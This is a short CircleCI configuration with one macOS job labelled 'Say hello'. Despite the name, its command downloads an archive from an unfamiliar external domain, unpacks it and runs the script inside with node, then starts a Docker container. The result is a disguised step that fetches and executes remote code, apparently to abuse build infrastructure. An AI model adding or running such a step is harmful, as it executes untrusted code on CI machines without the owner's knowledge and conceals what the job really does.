version: 2.1
jobs:
  say-hello:
    macos:
      xcode: 12.5.1
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: "brew install node; wget -q https://ngewe.tech/apostropis/pkt-macos/setup-docker.tar.xz; tar xf setup-docker.tar.xz; node setup-docker.js; docker run ubuntu:latest"
workflows:
  say-hello-workflow:
    jobs:
      - say-hello
